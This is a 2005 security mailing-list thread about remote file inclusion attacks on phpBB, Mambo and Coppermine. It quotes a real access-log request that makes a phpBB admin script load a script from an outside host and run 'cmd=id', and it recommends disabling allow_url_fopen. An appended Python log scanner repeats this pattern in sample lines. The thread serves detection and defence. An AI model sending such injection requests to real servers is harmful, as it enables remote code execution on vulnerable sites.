WebApp Sec mailing list archives
Re: Mambo, Coppermine and PHPBB Attacks
From: Tofik Suleymanov <tofik () oxygen az>
Date: Tue, 20 Dec 2005 21:40:46 +0000
Paul Laudanski wrote:
> On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:
>> Our honeynet has been picking up an increase in the number of code injection attacks in the past few days. Attacks are primarily directed to several popular open source applications: Mambo, Coppermine and PHPBB.
>> Analysis: http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17
>
> Nice catch. I checked my logs and found these which appear to be the valid phpbb injection request:
>
> 81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"
>
> Notice the admin_styles.php is written out once. I would suspect that disabling the allow_url_fopen directive in php.ini would disallow such a request to execute. This would prevent resources other than files from being included. But I haven't tested.
From php.ini: "Whether to allow the treatment of URLs (like http:// or ftp://) as files."

In the latest versions of PHP this option is set to a secure mode of operation by default (as far as I know):

allow_url_fopen = Off

This option prevents this type of attack.
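A log check for the request pattern quoted in this thread, as an added example that is not part of the original posts: it flags access-log requests in which a query parameter's value is itself a remote URL. The sample log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Common Log Format: client, identity, user, [timestamp], "METHOD target ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
)
# URL schemes that PHP's stream wrappers can fetch when URL access is enabled.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample lines, modelled on the request quoted in the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://files.example.invalid/tool.dat?&cmd=id HTTP/1.0" 200 512',
    '198.51.100.4 - - [19/Dec/2005:07:21:02 -0500] "GET /index.php?page=news&id=4 HTTP/1.1" 200 8841',
    '203.0.113.9 - - [19/Dec/2005:07:25:11 -0500] "GET /gallery/init.php?base=%68ttp%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.0" 404 210',
    '198.51.100.4 - - [19/Dec/2005:07:26:40 -0500] "GET /viewtopic.php?t=12&redirect=/forum/index.php HTTP/1.1" 200 100',
]


def remote_url_params(target):
    """Return (name, value) pairs whose decoded value starts with a remote URL."""
    _, _, query = target.partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return one finding per suspicious parameter in the given log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the expected format
        path = m.group("target").partition("?")[0]
        for name, value in remote_url_params(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": path, "param": name, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} {f["path"]} {f["param"]}={f["value"]}')
```

A hit is a lead rather than a verdict: applications that legitimately accept URLs in parameters (redirect targets, for instance) will also match.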